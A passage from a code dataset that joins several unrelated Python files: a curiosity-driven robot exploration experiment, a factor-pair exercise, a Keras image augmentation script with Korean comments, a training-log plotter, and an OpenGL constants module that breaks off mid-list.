ms_array.shape\n # Update each sensorimotor models:\n for mid in self.learning_modules.keys():\n #print mid, self.learning_modules[mid].s_space, ms_array[:,self.learning_modules[mid].s_space]\n self.learning_modules[mid].update_sm(m, np.concatenate(ms_array[:,self.learning_modules[mid].s_space]))\n \n self.data.append(ms_array)\n self.steps.append(steps)\n self.i += 1\n return ms_array, steps\n \n \n def compute_explo_space(self, s_space, n_checkpoints=1):\n data = np.array([self.data[i][-1,self.s_spaces[s_space]] for i in range(len(self.data))])\n mins = np.array([-1.5]*len(self.s_spaces[s_space]))\n maxs = np.array([1.5]*len(self.s_spaces[s_space]))\n checkpoints = [int(x) for x in np.linspace(len(data)/n_checkpoints, len(data), n_checkpoints)]\n n = len(mins)\n assert len(data[0]) == n\n gs = [0, 10, 100, 20, 10, 10, 10, 5, 5, 3][n]\n epss = (maxs - mins) / gs\n grid = np.zeros([gs] * n)\n #print np.size(grid), mins, maxs\n res = [0]\n for c in range(1, len(checkpoints)):\n for i in range(checkpoints[c-1], checkpoints[c]):\n idxs = np.array((data[i] - mins) / epss, dtype=int)\n #print c, i, idxs\n idxs[idxs>=gs] = gs-1\n idxs[idxs<0] = 0\n #print idxs\n grid[tuple(idxs)] = grid[tuple(idxs)] + 1\n grid[grid > 1] = 1\n res.append(np.sum(grid))\n return np.array(res) / gs ** n\n\n\n\n \n def run(self, iterations=100000, profile=False, print_logs=False):\n \n if profile:\n cp = cProfile.Profile()\n cp.enable()\n \n t = time.clock()\n while self.i < iterations:\n if print_logs:\n # Print number of iterations up to now:\n if self.i - self.last_print > 1000:\n self.last_print = 1000 * (self.i // 1000)\n print(\"\\nIteration:\", self.i)\n print(\"Time:\", int(10.*(time.clock() - t)) / 10.)\n print(\"Average steps\", int(10.*self.avg_steps) / 10.)\n print(\"n_stick1_moved\", self.environment.n_stick1_moved - self.n_stick1_moved)\n print(\"n_stick2_moved\", self.environment.n_stick2_moved - self.n_stick2_moved)\n print(\"n_obj1_moved\", self.environment.n_obj1_moved - self.n_obj1_moved)\n print(\"n_obj2_moved\", self.environment.n_obj2_moved - self.n_obj2_moved)\n self.n_stick1_moved = self.environment.n_stick1_moved\n self.n_stick2_moved = self.environment.n_stick2_moved\n self.n_obj1_moved = self.environment.n_obj1_moved\n self.n_obj2_moved = self.environment.n_obj2_moved\n \n if self.condition == \"AMB\":\n for mid in [\"mod1\", \"mod2\", \"mod3\", \"mod4\", \"mod7\", \"mod10\"]:\n if mid in self.learning_modules:\n print(\"Interest of module\", mid, \":\", int(1000.*self.learning_modules[mid].interest_model.current_interest) / 1000.)\n \n t = time.clock()\n \n # Choose the babbling module (probabilities proportional to interests, with epsilon of random choice):\n if self.condition == \"RMB\":\n # Get the interest of modules\n interests = [self.learning_modules[mid].interest() for mid in self.learning_modules.keys()]\n self.interests_evolution.append(interests)\n babbling_module = np.random.choice(list(self.learning_modules.values()))\n elif self.condition == \"AMB\":\n # Get the interest of modules\n interests = [self.learning_modules[mid].interest() for mid in self.learning_modules.keys()]\n self.interests_evolution.append(interests)\n babbling_module = list(self.learning_modules.values())[prop_choice(interests, eps=0.2)]\n #babbling_module = self.learning_modules[\"mod1\"]\n elif self.condition == \"FRGB\" or self.condition == \"rmb\":\n babbling_module = self.learning_modules[\"mod1\"] \n elif self.condition == \"SGS\":\n babbling_module = self.learning_modules[\"mod4\"] \n elif self.condition == \"FC\":\n fc = [\"mod1\", \"mod2\", \"mod4\", \"mod3\", \"mod7\"]\n m = self.i // (iterations // len(fc))\n babbling_module = self.learning_modules[fc[m]]\n else:\n raise NotImplementedError\n \n # The babbling module picks a random goal in its sensory space and returns 4 noisy motor commands:\n if babbling_module.t < babbling_module.motor_babbling_n_iter or np.random.random() < self.rmb_prop or self.condition == \"rmb\":\n m = babbling_module.motor_babbling(steps=1)\n ms_array, steps = self.execute_perceive(m)\n self.chosen_modules.append(\"random\")\n else:\n self.chosen_modules.append(babbling_module.mid)\n sg = babbling_module.interest_model.sample()\n babbling_module.sg = sg\n for _ in range(self.n_explore):\n m = babbling_module.inverse(sg)\n ms_array, steps = self.execute_perceive(m)\n self.avg_steps = self.avg_steps * 0.99 + 0.01 * steps\n \n # Update Interest\n if self.condition == \"AMB\":\n m = babbling_module.inverse(sg, explore=False)\n ms_array, steps = self.execute_perceive(m)\n babbling_module.update_im(m, np.concatenate(ms_array[:,babbling_module.s_space]))\n \n \n \n \n if profile:\n cp.disable()\n cp.dump_stats(\"test.cprof\")\n \n if print_logs:\n print(\"n stick1_moved\", self.environment.n_stick1_moved)\n print(\"n stick2_moved\", self.environment.n_stick2_moved)\n print(\"n obj1_moved\", self.environment.n_obj1_moved)\n print(\"n obj2_moved\", self.environment.n_obj2_moved)\n \n print()\n print(\"Parameters:\", iterations, self.explo_noise, self.optim_explo, self.condition, self.distractors)\n \n\n\n def plot_interests(self):\n \n interests_evolution = np.array(self.interests_evolution)\n plt.plot(interests_evolution[:,0], label=\"hand\")\n plt.plot(interests_evolution[:,1], label=\"stick1\")\n plt.plot(interests_evolution[:,2], label=\"stick2\")\n plt.plot(interests_evolution[:,3], label=\"toy1\")\n plt.plot(interests_evolution[:,6], label=\"toy2\")\n plt.plot(interests_evolution[:,-1], label=\"static\")\n plt.plot(interests_evolution[:,9], label=\"cat\")\n \n plt.legend()\n \n def compute_explo(self):\n self.explo = {}\n for s_space in [\"s_hand\", \"s_tool1\", \"s_tool2\", \"s_obj1\", \"s_obj4\"]:\n self.explo[s_space] = self.compute_explo_space(s_space, 10)\n \n def plot_explo(self):\n for s_space in [\"s_hand\", \"s_tool1\", \"s_tool2\", \"s_obj1\", \"s_obj4\"]:\n plt.plot(self.explo[s_space], label=s_space)\n plt.legend()\n \n def dump(self, filename):\n to_store = dict(\n data=self.data,\n steps=self.steps,\n interests_evolution=self.interests_evolution,\n explo=self.explo,\n chosen_modules=self.chosen_modules\n )\n for key in to_store.keys():\n with open(filename + \"-\" + key + \".pickle\", 'wb') as f:\n pickle.dump(to_store[key], f)\n# \n# def load(self, filename):\n# with open(filename, 'r') as f:\n# logs = cPickle.load(f)\n# f.close()\n# self.data = logs[\"data\"]\n# self.interests_evolution = logs[\"interests_evolution\"]\n# \n# ","repo_name":"sebastien-forestier/IMGEP","sub_path":"2DSimulation/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":16580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"16844025399","text":"def get_factors(num):\n modList = []\n pairList = []\n for i in range(1, num + 1):\n if num % i == 0:\n modList.append(i)\n while modList:\n if len(modList) == 1:\n tup = (modList[0], modList.pop())\n else:\n tup = (modList.pop(0), modList.pop())\n pairList.append(tup)\n\n return pairList\n\n\nprint(get_factors(12))\nprint(get_factors(16))\n","repo_name":"jimturbo24/TIY-Homework","sub_path":"week_6/ex_1.py","file_name":"ex_1.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69800912805","text":"# 데이터 증강 이미지 저장\n\nfrom PIL import Image\nimport os\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport numpy as np\n\n# 원본 이미지 디렉토리 경로\noriginal_image_dir = './dataset/train/'\n\n# 데이터 증강된 이미지를 저장할 디렉토리 경로\naugmented_image_dir = './dataset/datagen/'\n\nread_folder = os.listdir(original_image_dir)\n\n# 데이터 증강 작업을 수행할 횟수\nnum_augmented_images = 10\n\n# ImageDataGenerator 설정\ndatagen = ImageDataGenerator(\n rescale=1.0/255.,\n rotation_range=2, # 회전 각도 범위 설정\n width_shift_range=0.07, # 가로 이동 범위 설정\n height_shift_range=0.07, # 세로 이동 범위 설정\n shear_range=0.07, # 전단 강도 범위 설정\n zoom_range=0.07, # 확대/축소 범위 설정\n #horizontal_flip=True, # 수평 반전 여부\n fill_mode='nearest' # 새로운 픽셀 채우는 방식\n)\n\nfor test in read_folder:\n original_image_path = os.path.join(original_image_dir, test)\n \n # 원본 이미지 파일 목록\n original_image_files = os.listdir(original_image_path)\n \n # 데이터 증강 작업을 수행하고 저장하는 반복문\n for original_image_file in original_image_files:\n \n # 원본 이미지를 불러옴\n original_img_file = os.path.join(original_image_path, original_image_file)\n #print(original_img_file)\n original_image = Image.open(original_img_file)\n original_image = np.array(original_image)\n\n # 데이터 증강 작업을 수행하고 이미지를 생성\n augmented_images = []\n for i in range(num_augmented_images):\n augmented_image = datagen.random_transform(original_image)\n augmented_images.append(augmented_image)\n\n # 생성된 이미지를 저장\n base_filename, _ = os.path.splitext(original_image_file)\n for i, augmented_image in enumerate(augmented_images):\n augmented_image_path = os.path.join(augmented_image_dir, test)\n if not os.path.exists(augmented_image_path):\n os.makedirs(augmented_image_path)\n print(augmented_image_path)\n saved_image = os.path.join(augmented_image_path, f'{base_filename}_aug_{i}.jpg')\n augmented_image = Image.fromarray(augmented_image)\n augmented_image.save(saved_image)\n\n print(f'{len(original_image_files)}개의 원본 이미지에서 {num_augmented_images}개의 데이터 증강 이미지를 각각 저장했습니다.')\n","repo_name":"sou05091/MainProject_LicensePlate","sub_path":"Number Plate Classification/Data Preprocessing Folder/ImageDataGenerator.py","file_name":"ImageDataGenerator.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5423356018","text":"import os\nimport sys\nimport logging\nimport re\n\nimport ujson as json\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef parse(filename, elapsed_unit=60*60):\n value_list = []\n with open(filename, 'r') as f:\n accumulated_time = 0\n for line in f:\n if 'INFO' not in line or 'epoch' not in line:\n continue\n if 'rank' in line and 'rank:00' not in line:\n continue\n line = re.sub(r'\\([^)]*\\)|\\[[^)]*\\]|{|}', r'', line)\n items = [item.split(':') for item in line.split(' ') if item.strip()]\n\n values = {}\n for item in items:\n key = item[0]\n value = item[-1].replace(',', '').replace('sec', '')\n if '/' in value:\n value = float(value.split('/')[0]) / float(value.split('/')[1])\n values[key] = float(value)\n values['elapsed'] = values['elapsed'] / elapsed_unit\n accumulated_time += values['elapsed']\n values['accumulated'] = accumulated_time\n value_list.append(values)\n return value_list\n\ndef sample(data, num_samples=100):\n step = len(data) // num_samples\n return data[::step]\n\ndef average(data, targets, steps=100):\n samples = []\n for i in range(len(data)//steps):\n sample = data[i*steps:i*steps+steps]\n\n result = {'step':sample[0]['step'], 'epoch':sample[0]['epoch'], 'accumulated':sample[0]['accumulated']}\n for t in targets:\n result[t] = np.average([d[t] for d in sample])\n samples.append(result)\n return samples\n\ndef main(args):\n matplotlib.rc('font', family=\"AppleGothic\")\n\n logging.info(args)\n datas = [parse(filename) for filename in args.files]\n targets = ['loss', 'learning-rate', 'accuracy', 'top5']\n\n for xaxis in ['epoch', 'elapsed']:\n fig = plt.figure(figsize=(12, 8))\n for i, target in enumerate(targets):\n ax = fig.add_subplot(2, 2, i+1)\n ax.set_xlabel(xaxis.replace('elapsed', 'elapsed (hours)'), fontsize=12)\n ax.set_ylabel(target, fontsize=12)\n\n for filename, data in zip(args.files, datas):\n filename = filename.split('/')[-1]\n data = sample(data, args.samples) if args.sample else average(data, targets, args.samples)\n if xaxis == 'epoch':\n ax.plot([d['step']+d['epoch'] for d in data], [d[target] for d in data], label=filename)\n if xaxis == 'elapsed':\n ax.plot([d['accumulated'] for d in data], [d[target] for d in data], label=filename)\n if target in ['accuracy', 'top5']:\n ax.set_ylim(0.0, 1.0)\n ax.legend()\n fig.tight_layout()\n fig.savefig(args.output + '-'+xaxis+'.png')\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('files', type=str, nargs='+')\n parser.add_argument('-o', '--output', type=str, default='result')\n parser.add_argument('-n', '--samples', type=int, default=100)\n parser.add_argument('--sample', action='store_true')\n parser.add_argument('--log-filename', type=str, default='')\n args = parser.parse_args()\n\n if not args.log_filename:\n logging.basicConfig(level=logging.INFO, format='[%(asctime)s %(levelname)s] %(message)s', stream=sys.stderr)\n else:\n logging.basicConfig(level=logging.INFO, format='[%(asctime)s %(levelname)s] %(message)s', filename=args.log_filename)\n\n main(args)\n\n","repo_name":"wbaek/distributed-tf","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37414910096","text":"\"\"\"Constants and enums.\n\n@todo: Add stencil components to L{texture_formats}.\n\n@author: Stephan Wenger\n@date: 2012-02-29\n\"\"\"\n\nimport glitter.raw as _gl\nfrom glitter.utils.dtypes import uint8, uint16, uint32, int8, int16, int32, float32\nfrom glitter.utils.enum import Enum\n\nformat_to_length = {\n #_gl.GL_COLOR_INDEX: 1,\n _gl.GL_STENCIL_INDEX: 1,\n _gl.GL_DEPTH_COMPONENT: 1,\n _gl.GL_RED: 1,\n _gl.GL_GREEN: 1,\n _gl.GL_BLUE: 1,\n _gl.GL_ALPHA: 1,\n _gl.GL_RGB: 3,\n _gl.GL_BGR: 3,\n _gl.GL_RGBA: 4,\n _gl.GL_BGRA: 4,\n #_gl.GL_LUMINANCE: 1,\n #_gl.GL_LUMINANCE_ALPHA: 2,\n }\n\ntexture_formats = [ # WARNING: In case of ambiguities, the LAST ONE will win.\n ((float32, 1), _gl.GL_DEPTH_COMPONENT32F, (_gl.GL_FLOAT, _gl.GL_DEPTH_COMPONENT)),\n ((int16, 1), _gl.GL_DEPTH_COMPONENT16, (_gl.GL_SHORT, _gl.GL_DEPTH_COMPONENT)),\n ((int32, 1), _gl.GL_DEPTH_COMPONENT24, (_gl.GL_INT, _gl.GL_DEPTH_COMPONENT)),\n ((int32, 1), _gl.GL_DEPTH_COMPONENT32, (_gl.GL_INT, _gl.GL_DEPTH_COMPONENT)),\n\n ((uint8, 1), _gl.GL_R8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RED_INTEGER )),\n ((int8, 1), _gl.GL_R8I, (_gl.GL_BYTE, _gl.GL_RED_INTEGER )),\n ((uint16, 1), _gl.GL_R16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RED_INTEGER )),\n ((int16, 1), _gl.GL_R16I, (_gl.GL_SHORT, _gl.GL_RED_INTEGER )),\n ((uint32, 1), _gl.GL_R32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RED_INTEGER )),\n ((int32, 1), _gl.GL_R32I, (_gl.GL_INT, _gl.GL_RED_INTEGER )),\n ((float32, 1), _gl.GL_R32F, (_gl.GL_FLOAT, _gl.GL_RED )),\n ((uint8, 2), _gl.GL_RG8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RG_INTEGER )),\n ((int8, 2), _gl.GL_RG8I, (_gl.GL_BYTE, _gl.GL_RG_INTEGER )),\n ((uint16, 2), _gl.GL_RG16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RG_INTEGER )),\n ((int16, 2), _gl.GL_RG16I, (_gl.GL_SHORT, _gl.GL_RG_INTEGER )),\n ((uint32, 2), _gl.GL_RG32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RG_INTEGER )),\n ((int32, 2), _gl.GL_RG32I, (_gl.GL_INT, _gl.GL_RG_INTEGER )),\n ((float32, 2), _gl.GL_RG32F, (_gl.GL_FLOAT, _gl.GL_RG )),\n ((uint8, 3), _gl.GL_RGB8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RGB_INTEGER )),\n ((int8, 3), _gl.GL_RGB8I, (_gl.GL_BYTE, _gl.GL_RGB_INTEGER )),\n ((uint16, 3), _gl.GL_RGB16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RGB_INTEGER )),\n ((int16, 3), _gl.GL_RGB16I, (_gl.GL_SHORT, _gl.GL_RGB_INTEGER )),\n ((uint32, 3), _gl.GL_RGB32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RGB_INTEGER )),\n ((int32, 3), _gl.GL_RGB32I, (_gl.GL_INT, _gl.GL_RGB_INTEGER )),\n ((float32, 3), _gl.GL_RGB32F, (_gl.GL_FLOAT, _gl.GL_RGB )),\n ((uint8, 4), _gl.GL_RGBA8UI, (_gl.GL_UNSIGNED_BYTE, _gl.GL_RGBA_INTEGER)),\n ((int8, 4), _gl.GL_RGBA8I, (_gl.GL_BYTE, _gl.GL_RGBA_INTEGER)),\n ((uint16, 4), _gl.GL_RGBA16UI, (_gl.GL_UNSIGNED_SHORT, _gl.GL_RGBA_INTEGER)),\n ((int16, 4), _gl.GL_RGBA16I, (_gl.GL_SHORT, _gl.GL_RGBA_INTEGER)),\n ((uint32, 4), _gl.GL_RGBA32UI, (_gl.GL_UNSIGNED_INT, _gl.GL_RGBA_INTEGER)),\n ((int32, 4), _gl.GL_RGBA32I, (_gl.GL_INT, _gl.GL_RGBA_INTEGER)),\n ((float32, 4), _gl.GL_RGBA32F, (_gl.GL_FLOAT, _gl.GL_RGBA )),\n ]\n\"\"\"Mapping between C{numpy} types and OpenGL types.\n\nFirst column: C{numpy} datatype, number of color channels\nSecond column: OpenGL internal format\nThird column: OpenGL type, OpenGL format\n\"\"\"\n\ndtype_to_gl_iformat = dict((x[0], x[1] ) for x in texture_formats)\ngl_iformat_to_dtype = dict((x[1], x[0] ) for x in texture_formats)\ndtype_to_gl_format = dict((x[0], x[2][1]) for x in texture_formats)\ngl_format_to_dtype = dict((x[2][1], x[0] ) for x in texture_formats)\ngl_iformat_to_gl_type = dict((x[1], x[2][0]) for x in texture_formats)\n\ntexture_compare_funcs = Enum(\n LEQUAL=_gl.GL_LEQUAL,\n GEQUAL=_gl.GL_GEQUAL,\n LESS=_gl.GL_LESS,\n GREATER=_gl.GL_GREATER,\n EQUAL=_gl.GL_EQUAL,\n NOTEQUAL=_gl.GL_NOTEQUAL,\n ALWAYS=_gl.GL_ALWAYS,\n NEVER=_gl.GL_NEVER,\n )\n\ntexture_compare_modes = Enum(\n COMPARE_REF_TO_TEXTURE=_gl.GL_COMPARE_REF_TO_TEXTURE,\n NONE=_gl.GL_NONE,\n )\n\ntexture_min_filters = Enum(\n NEAREST=_gl.GL_NEAREST,\n LINEAR=_gl.GL_LINEAR,\n NEAREST_MIPMAP_NEAREST=_gl.GL_NEAREST_MIPMAP_NEAREST,\n LINEAR_MIPMAP_NEAREST=_gl.GL_LINEAR_MIPMAP_NEAREST,\n NEAREST_MIPMAP_LINEAR=_gl.GL_NEAREST_MIPMAP_LINEAR,\n LINEAR_MIPMAP_LINEAR=_gl.GL_LINEAR_MIPMAP_LINEAR,\n )\n\ntexture_mag_filters = Enum(\n NEAREST=_gl.GL_NEAREST,\n LINEAR=_gl.GL_LINEAR,\n )\n\ntexture_swizzles = Enum(\n RED=_gl.GL_RED,\n GREEN=_gl.GL_GREEN,\n BLUE=_gl.GL_BLUE,\n ALPHA=_gl.GL_ALPHA,\n ZERO=_gl.GL_ZERO,\n ONE=_gl.GL_ONE,\n )\n\ntexture_wrapmodes = Enum(\n CLAMP_TO_EDGE=_gl.GL_CLAMP_TO_EDGE,\n CLAMP_TO_BORDER=_gl.GL_CLAMP_TO_BORDER,\n MIRRORED_REPEAT=_gl.GL_MIRRORED_REPEAT,\n REPEAT=_gl.GL_REPEAT,\n )\n\nprimitive_types = Enum(\n POINTS=_gl.GL_POINTS,\n LINE_STRIP=_gl.GL_LINE_STRIP,\n LINE_LOOP=_gl.GL_LINE_LOOP,\n LINES=_gl.GL_LINES,\n LINE_STRIP_ADJACENCY=_gl.GL_LINE_STRIP_ADJACENCY,\n LINES_ADJACENCY=_gl.GL_LINES_ADJACENCY,\n TRIANGLE_STRIP=_gl.GL_TRIANGLE_STRIP,\n TRIANGLE_FAN=_gl.GL_TRIANGLE_FAN,\n TRIANGLES=_gl.GL_TRIANGLES,\n TRIANGLE_STRIP_ADJACENCY=_gl.GL_TRIANGLE_STRIP_ADJACENCY,\n TRIANGLES_ADJACENCY=_gl.GL_TRIANGLES_ADJACENCY,\n PATCHES=_gl.GL_PATCHES,\n )\n\nbuffer_usages = Enum(\n STREAM_DRAW=_gl.GL_STREAM_DRAW,\n STREAM_READ=_gl.GL_STREAM_READ,\n STREAM_COPY=_gl.GL_STREAM_COPY,\n STATIC_DRAW=_gl.GL_STATIC_DRAW,\n STATIC_READ=_gl.GL_STATIC_READ,\n STATIC_COPY=_gl.GL_STATIC_COPY,\n DYNAMIC_DRAW=_gl.GL_DYNAMIC_DRAW,\n DYNAMIC_READ=_gl.GL_DYNAMIC_READ,\n DYNAMIC_COPY=_gl.GL_DYNAMIC_COPY,\n )\n\nbuffer_dimensions_to_primitive = {1: primitive_types.POINTS, 2: primitive_types.LINES, 3: primitive_types.TRIANGLES}\nprimitive_to_buffer_dimensions = {primitive_types.POINTS: 1, primitive_types.LINES: 2, primitive_types.TRIANGLES: 3}\n\nblend_functions = Enum(\n ZERO=_gl.GL_ZERO,\n ONE=_gl.GL_ONE,\n SRC_COLOR=_gl.GL_SRC_COLOR,\n ONE_MINUS_SRC_COLOR=_gl.GL_ONE_MINUS_SRC_COLOR,\n DST_COLOR=_gl.GL_DST_COLOR,\n ONE_MINUS_DST_COLOR=_gl.GL_ONE_MINUS_DST_COLOR,\n SRC_ALPHA=_gl.GL_SRC_ALPHA,\n ONE_MINUS_SRC_ALPHA=_gl.GL_ONE_MINUS_SRC_ALPHA,\n DST_ALPHA=_gl.GL_DST_ALPHA,\n ONE_MINUS_DST_ALPHA=_gl.GL_ONE_MINUS_DST_ALPHA,\n CONSTANT_COLOR=_gl.GL_CONSTANT_COLOR,\n ONE_MINUS_CONSTANT_COLOR=_gl.GL_ONE_MINUS_CONSTANT_COLOR,\n CONSTANT_ALPHA=_gl.GL_CONSTANT_ALPHA,\n ONE_MINUS_CONSTANT_ALPHA=_gl.GL_ONE_MINUS_CONSTANT_ALPHA,\n SRC_ALPHA_SATURATE=_gl.GL_SRC_ALPHA_SATURATE,\n)\n\nblend_equations = Enum(\n ADD=_gl.GL_FUNC_ADD,\n SUBTRACT=_gl.GL_FUNC_SUBTRACT,\n REVERSE_SUBTRACT=_gl.GL_FUNC_REVERSE_SUBTRACT,\n MIN=_gl.GL_MIN,\n MAX=_gl.GL_MAX,\n)\n\ndepth_functions = Enum(\n NEVER=_gl.GL_NEVER,\n LESS=_gl.GL_LESS,\n EQUAL=_gl.GL_EQUAL,\n LEQUAL=_gl.GL_LEQUAL,\n GREATER=_gl.GL_GREATER,\n NOTEQUAL=_gl.GL_NOTEQUAL,\n GEQUAL=_gl.GL_GEQUAL,\n ALWAYS=_gl.GL_ALWAYS,\n)\n\ndraw_buffers = Enum(\n NONE=_gl.GL_NONE,\n FRONT_LEFT=_gl.GL_FRONT_LEFT,\n FRONT_RIGHT=_gl.GL_FRONT_RIGHT,\n BACK_LEFT=_gl.GL_BACK_LEFT,\n BACK_RIGHT=_gl.GL_BACK_RIGHT,\n FRONT=_gl.GL_FRONT,\n BACK=_gl.GL_BACK,\n LEFT=_gl.GL_LEFT,\n RIGHT=_gl.GL_RIGHT,\n FRONT_AND_BACK=_gl.GL_FRONT_AND_BACK,\n)\nfor key, value in list(_gl.__dict__.items()):\n if key.startswith(\"GL_COLOR_ATTACHMENT\"):\n draw_buffers._add(key[3:], value)\n\nhints = Enum(\n FASTEST=_gl.GL_FASTEST,\n NICEST=_gl.GL_NICEST,\n DONT_CARE=_gl.GL_DONT_CARE,\n)\n\nprovoking_vertices = Enum(\n PROVOKING=_gl.GL_PROVOKING_VERTEX,\n FIRST=_gl.GL_FIRST_VERTEX_CONVENTION,\n LAST=_gl.GL_LAST_VERTEX_CONVENTION,\n UNDEFINED=_gl.GL_UNDEFINED_VERTEX,\n)\n\nlogic_op_modes = Enum(\n CLEAR=_gl.GL_CLEAR,\n SET=_gl.GL_SET,\n COPY=_gl.GL_COPY,\n COPY_INVERTED=_gl.GL_COPY_INVERTED,\n NOOP=_gl.GL_NOOP,\n INVERT=_gl.GL_INVERT,\n AND=_gl.GL_AND,\n NAND=_gl.GL_NAND,\n OR=_gl.GL_OR,\n NOR=_gl.GL_NOR,\n XOR=_gl.GL_XOR,\n EQUIV=_gl.GL_EQUIV,\n AND_REVERSE=_gl.GL_AND_REVERSE,\n AND_INVERTED=_gl.GL_AND_INVERTED,\n OR_REVERSE=_gl.GL_OR_REVERSE,\n OR_INVERTED=_gl.GL_OR_INVERTED,\n)\n\nprovoke_modes = Enum(\n FIRST_VERTEX_CONVENTION=_gl.GL_FIRST_VERTEX_CONVENTION,\n LAST_VERTEX_CONVENTION=_gl.GL_LAST_VERTEX_CONVENTION,\n)\n\ncolor_read_formats = Enum(\n STENCIL_INDEX=_gl.GL_STENCIL_INDEX,\n DEPTH_COMPONENT=_gl.GL_DEPTH_COMPONENT,\n DEPTH_STENCIL=_gl.GL_DEPTH_STENCIL,\n RED=_gl.GL_RED,\n GREEN=_gl.GL_GREEN,\n BLUE=_gl.GL_BLUE,\n RGB=_gl.GL_RGB,\n BGR=_gl.GL_BGR,\n RGBA=_gl.GL_RGBA,\n BGRA=_gl.GL_BGRA,\n)\n\ncolor_read_types = Enum(\n UNSIGNED_BYTE=_gl.GL_UNSIGNED_BYTE,\n BYTE=_gl.GL_BYTE,\n UNSIGNED_SHORT=_gl.GL_UNSIGNED_SHORT,\n SHORT=_gl.GL_SHORT,\n UNSIGNED_INT=_gl.GL_UNSIGNED_INT,\n INT=_gl.GL_INT,\n HALF_FLOAT=_gl.GL_HALF_FLOAT,\n FLOAT=_gl.GL_FLOAT,\n UNSIGNED_BYTE_3_3_2=_gl.GL_UNSIGNED_BYTE_3_3_2,\n UNSIGNED_BYTE_2_3_3_REV=_gl.GL_UNSIGNED_BYTE_2_3_3_REV,\n UNSIGNED_SHORT_5_6_5=_gl.GL_UNSIGNED_SHORT_5_6_5,\n UNSIGNED_SHORT_5_6_5_REV=_gl.GL_UNSIGNED_SHORT_5_6_5_REV,\n UNSIGNED_SHORT_4_4_4_4=_gl.GL_UNSIGNED_SHORT_4_4_4_4,\n UNSIGNED_SHORT_4_4_4_4_REV=_gl.GL_UNSIGNED_SHORT_4_4_4_4_REV,\n UNSIGNED_SHORT_5_5_5_1=_gl.GL_UNSIGNED_SHORT_5_5_5_1,\n UNSIGNED_SHORT_1_5_5_5_REV=_gl.GL_UNSIGNED_SHORT_1_5_5_5_REV,\n UNSIGNED_INT_8_8_8_8=_gl.GL_UNSIGNED_INT_8_8_8_8,\n UNSIGNED_INT_8_8_8_8_REV=_gl.GL_UNSIGNED_INT_8_8_8_8_REV,\n UNSIGNED_INT_10_10_10_2=_gl.GL_UNSIGNED_INT_10_10_10_2,\n UNSIGNED_INT_2_10_10_10_REV=_gl.GL_UNSIGNED_INT_2_10_10_10_REV,\n UNSIGNED_INT_24_8=_gl.GL_UNSIGNED_INT_24_8,\n UNSIGNED_INT_10F_11F_11F_REV=_gl.GL_UNSIGNED_INT_10F_11F_11F_REV,\n UNSIGNED_INT_5_9_9_9_REV=_gl.GL_UNSIGNED_INT_5_9_9_9_REV,\n FLOAT_32_UNSIGNED_INT_24_8_REV=_gl.GL_FLOAT_32_UNSIGNED_INT_24_8_REV,\n)\n\nread_buffers = Enum(\n NONE=_gl.GL_NONE,\n FRONT_LEFT=_gl.GL_FRONT_LEFT,\n FRONT_RIGHT=_gl.GL_FRONT_RIGHT,\n BACK_LEFT=_gl.GL_BACK_LEFT,\n BACK_RIGHT=_gl.GL_BACK_RIGHT,\n FRONT=_gl.GL_FRONT,\n BACK=_gl.GL_BACK,\n LEFT=_gl.GL_LEFT,\n RIGHT=_gl.GL_RIGHT,\n)\nfor key, value in list(_gl.__dict__.items()):\n if key.startswith(\"GL_COLOR_ATTACHMENT\"):\n read_buffers._add(key[3:], value)\n\ntransform_feedback_buffer_modes = Enum(\n SEPARATE_ATTRIBS=_gl.GL_SEPARATE_ATTRIBS,\n INTERLEAVED_ATTRIBS=_gl.GL_INTERLEAVED_ATTRIBS,\n)\n\nclient_wait_sync_returns = Enum(\n ALREADY_SIGNALED=_gl.GL_ALREADY_SIGNALED,\n TIMEOUT_EXPIRED=_gl.GL_TIMEOUT_EXPIRED,\n CONDITION_SATISFIED=_gl.GL_CONDITION_SATISFIED,\n WAIT_FAILED=_gl.GL_WAIT_FAILED,\n)\n\nframebuffer_status = Enum(\n COMPLETE=_gl.GL_FRAMEBUFFER_COMPLETE,\n UNDEFINED=_gl.GL_FRAMEBUFFER_UNDEFINED,\n UNSUPPORTED=_gl.GL_FRAMEBUFFER_UNSUPPORTED,\n INCOMPLETE_ATTACHMENT=_gl.GL_FRAMEBUFFER_INCOMPLETE_ATTACHMENT,\n INCOMPLETE_MISSING_ATTACHMENT=_gl.GL_FRAMEBUFFER_INCOMPLETE_MISSING_ATTACHMENT,\n INCOMPLETE_DRAW_BUFFER=_gl.GL_FRAMEBUFFER_INCOMPLETE_DRAW_BUFFER,\n INCOMPLETE_READ_BUFFER=_gl.GL_FRAMEBUFFER_INCOMPLETE_READ_BUFFER,\n INCOMPLETE_MULTISAMPLE=_gl.GL_FRAMEBUFFER_INCOMPLETE_MULTISAMPLE,\n INCOMPLETE_LAYER_TARGETS=_gl.GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS,\n)\n\ncull_face_modes = Enum(\n FRONT=_gl.GL_FRONT,\n BACK=_gl.GL_BACK,\n FRONT_AND_BACK=_gl.GL_FRONT_AND_BACK,\n)\n\nfront_face_modes = Enum(\n CW=_gl.GL_CW,\n CCW=_gl.GL_CCW,\n)\n\npolygon_modes = Enum(\n POINT=_gl.GL_POINT,\n LINE=_gl.GL_LINE,\n FILL=_gl.GL_FILL,\n)\n\n__all__ = [\n 